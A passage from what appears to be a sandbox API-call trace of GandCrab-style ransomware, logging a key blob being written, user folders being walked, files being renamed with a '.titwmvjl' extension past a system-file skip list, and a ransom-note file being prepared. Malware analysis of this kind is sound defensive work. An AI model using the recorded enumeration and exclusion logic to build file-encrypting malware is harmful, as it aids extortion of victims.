36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0092.367] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0092.368] CloseHandle (hObject=0x230) returned 1 [0092.368] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.368] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.369] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x25, wMilliseconds=0x2a5)) [0092.369] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.369] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0092.369] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0092.369] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Links\\d2ca4a09d2ca4deb61a.lock") returned 52 [0092.369] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Links\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\links\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0092.370] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.370] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.370] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\") returned 28 [0092.370] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Links\\*" [0092.370] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Links\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x5035b8 [0092.370] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.370] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.371] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.371] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.371] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.371] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0092.371] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0092.371] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Links\\d2ca4a09d2ca4deb61a.lock" [0092.372] lstrlenW (lpString=".titwmvjl") returned 9 [0092.372] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\d2ca4a09d2ca4deb61a.lock") returned 52 [0092.372] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.372] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Links\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 61 [0092.372] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\d2ca4a09d2ca4deb61a.lock") returned 52 [0092.372] lstrlenW (lpString=".lock") returned 5 [0092.372] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.372] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0092.372] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.372] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.373] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.373] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0092.373] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0092.373] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Links\\desktop.ini" [0092.373] lstrlenW (lpString=".titwmvjl") returned 9 [0092.373] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\desktop.ini") returned 39 [0092.373] VirtualAlloc (lpAddress=0x0, dwSize=0x8e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.373] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Links\\desktop.ini.titwmvjl") returned 48 [0092.373] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\desktop.ini") returned 39 [0092.373] lstrlenW (lpString=".ini") returned 4 [0092.373] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.373] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0092.373] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0092.373] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.374] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\desktop.ini") returned 39 [0092.374] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\desktop.ini") returned 39 [0092.374] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0092.374] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.374] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.374] lstrcmpW (lpString1="Desktop.lnk", lpString2=".") returned 1 [0092.374] lstrcmpW (lpString1="Desktop.lnk", lpString2="..") returned 1 [0092.374] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\", lpString2="Desktop.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\Desktop.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\Links\\Desktop.lnk" [0092.374] lstrlenW (lpString=".titwmvjl") returned 9 [0092.374] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\Desktop.lnk") returned 39 [0092.374] VirtualAlloc (lpAddress=0x0, dwSize=0x8e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.374] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Links\\Desktop.lnk.titwmvjl") returned 48 [0092.374] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\Desktop.lnk") returned 39 [0092.374] lstrlenW (lpString=".lnk") returned 4 [0092.374] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.374] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0092.375] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.375] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.375] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.375] lstrcmpW (lpString1="Downloads.lnk", lpString2=".") returned 1 [0092.375] lstrcmpW (lpString1="Downloads.lnk", lpString2="..") returned 1 [0092.375] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\", lpString2="Downloads.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\Downloads.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\Links\\Downloads.lnk" [0092.375] lstrlenW (lpString=".titwmvjl") returned 9 [0092.375] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\Downloads.lnk") returned 41 [0092.375] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.375] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Links\\Downloads.lnk.titwmvjl") returned 50 [0092.375] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\Downloads.lnk") returned 41 [0092.375] lstrlenW (lpString=".lnk") returned 4 [0092.375] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.375] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0092.376] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.376] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.376] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.376] lstrcmpW (lpString1="OneDrive.lnk", lpString2=".") returned 1 [0092.376] lstrcmpW (lpString1="OneDrive.lnk", lpString2="..") returned 1 [0092.376] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\", lpString2="OneDrive.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\OneDrive.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\Links\\OneDrive.lnk" [0092.376] lstrlenW (lpString=".titwmvjl") returned 9 [0092.376] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\OneDrive.lnk") returned 40 [0092.376] VirtualAlloc (lpAddress=0x0, dwSize=0x90, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.376] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Links\\OneDrive.lnk.titwmvjl") returned 49 [0092.377] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\OneDrive.lnk") returned 40 [0092.377] lstrlenW (lpString=".lnk") returned 4 [0092.377] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.377] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0092.377] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.377] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.377] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.377] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0092.377] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0092.377] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Links\\TITWMVJL-DECRYPT.txt" [0092.377] lstrlenW (lpString=".titwmvjl") returned 9 [0092.377] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\TITWMVJL-DECRYPT.txt") returned 48 [0092.378] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.378] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Links\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 57 [0092.378] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\TITWMVJL-DECRYPT.txt") returned 48 [0092.378] lstrlenW (lpString=".txt") returned 4 [0092.378] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.378] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0092.378] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0092.378] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.378] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\TITWMVJL-DECRYPT.txt") returned 48 [0092.378] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\TITWMVJL-DECRYPT.txt") returned 48 [0092.378] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0092.378] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0092.378] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0092.379] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0092.379] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0092.379] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0092.379] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0092.379] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0092.379] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.379] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0092.379] FindClose (in: hFindFile=0x5035b8 | out: hFindFile=0x5035b8) returned 1 [0092.380] CloseHandle (hObject=0x230) returned 1 [0092.380] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0092.380] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1 [0092.380] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1 [0092.380] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Local Settings" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Local Settings") returned="C:\\Users\\CIiHmnxMn6Ps\\Local Settings" [0092.380] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Local Settings", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Local Settings\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Local Settings\\" [0092.380] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0092.380] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.380] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0092.380] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0092.380] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0092.381] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Music" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music") returned="C:\\Users\\CIiHmnxMn6Ps\\Music" [0092.381] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\" [0092.381] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0092.381] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.381] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0092.381] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.381] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0092.381] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.382] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0092.382] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.382] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0092.382] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.382] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.382] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: 